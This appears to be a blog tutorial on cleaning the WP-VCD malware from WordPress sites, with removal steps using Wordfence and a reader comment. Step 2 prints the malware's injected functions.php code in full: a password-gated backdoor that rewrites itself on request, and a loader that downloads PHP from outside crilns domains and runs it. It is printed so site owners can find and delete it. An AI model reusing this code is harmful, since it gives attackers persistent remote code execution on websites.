Wp-vcd.php, wp-tmp.php, wp-feed.php, Otrwaram WordPress

wp-vcd.php wp-tmp.php wp-feed.php removal
Wp-security: Wp-vcd.php, wp-tmp.php, wp-feed.php removal

Introduction: wp-vcd.php, wp-tmp.php, wp-feed.php

You came to the right position. Yes, this is what you are searching for. Your WordPress may be influenced by viruses or attackers. Am I right? You may be noticed that at the time of visiting your site, it wants for allowing notification. When you allow, a popup ad will show opening a new window. These links are (push-dacehij-2357 . pushails .com, 2357. pushails .com, otrwaram .com, otrwaram.com WordPress)However, somehow you came to know that it might be for wp-include> wp-vcd.php, wp-tmp.php, wp-feed.php. If you face this problem, it will also change your, theme> Your Theme> function.php and wp-include> wp-post.php. If you delete them, they will automatically regenerate themselves again. However, in this tutorial, I will guide you completely on how to get rid of this problem. So, let’s see how to remove wp-vcd.php WordPress malware.

Read more> How to change the color of the address bar

How do I know that my site is hacked or attacked?

First of all, at the time of browsing your website, if you see that your site opens a new window or asks for allowing notification, then your site is influenced by malware. You might see these links (2357. pushails .com, otrwaram.com wordpress). To confirm, install Wordfence Security – Firewall & Malware Scan Plugin. After that active, it and run a scan. If you see, Wordfence finds out these files “wp-vcd.php, wp-tmp.php, wp-feed.php”, your site is attacked.

Why my WordPress is hacked or attacked by this problem?

Are you curious to know why your site is hacked? If so, how? Of course, you are using free, nulled or virus affected theme & plugin. So your site has been attacked by wp-vcd.php malware. If you use a theme or plugin that is affected by the virus, you will face this problem. And these themes & plugins will create wp-vcd.php, wp-tmp.php, wp-feed.php. They will also modify your WordPress’s core file & theme’s function.php. However, the attacker injects some functions to make money through advertising.

How to remove Wp-vcd.php, wp-tmp.php, wp-feed.php completely

To get rid of this problem, follow the following steps to remove wp-vcd.php malware.

Step 1: Virus influenced theme and plugin removal

First of all, remove the plugin or theme that is recently installed and from then you are facing this problem.

Step 2: Modified or changed function.php recovery

Remove the following code and save it. Or if you have a premium theme or the theme that has no virus, unzip it. And find out function.php. Open it from a PHP or text opener. The see what is opening code of it. Or match it with your site’s one. Remember, if you do not remove the affected plugin, the code will generate again, though you manually remove this code from Cpanel> File manager> Public_html> Wp-content> themes> Your Theme> function.php, To confirm, first remove this code and reload the page. If you don’t see it again, the code successfully removed.

//hmOTE0Nyc7CiAgICAgICAgaWYgKCgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb 250
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'fbeecf53fbadc86093d23daae9d5c240'))
switch ($_REQUEST['action'])
case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); }
$div_code_name = "wp_vcd";
$funcfile = FILE;
if(!function_exists('theme_temp_setup')) {
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?php\n" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); }
$wp_auth_key='63c8 d53637ade64b66da22dcdcc8d269';
if (($tmpcontent = @file_get_contents("http://www.crilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.cri lns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.crilns.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www. crilns.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } }
//$start_wp_theme_ tmp
//11111111111111111111111 11111111111111111111

Step 3: Wp-vcd.php, wp-tmp.php, wp-feed.php removals

Delete wp-vcd.php, wp-tmp.php and wp-feed.php files from Wordfence plugin. After scanning, you will get these files.

Step 4: Wp-post.php restore

Restore wp-post.php from Wordfence plugin. Finally, you are done.

After following all steps, scan your site again.

I hope you will fix your WordPress malware problem. If you still face this otrwaram. com WordPress problem, drop a comment, or contact me through the contact us page.


  1. Thank you – this was clear and concise. My version was a bit different, and didn’t have the vcd file, only the other 2… running a scan now to double check.


Please enter your comment!
Please enter your name here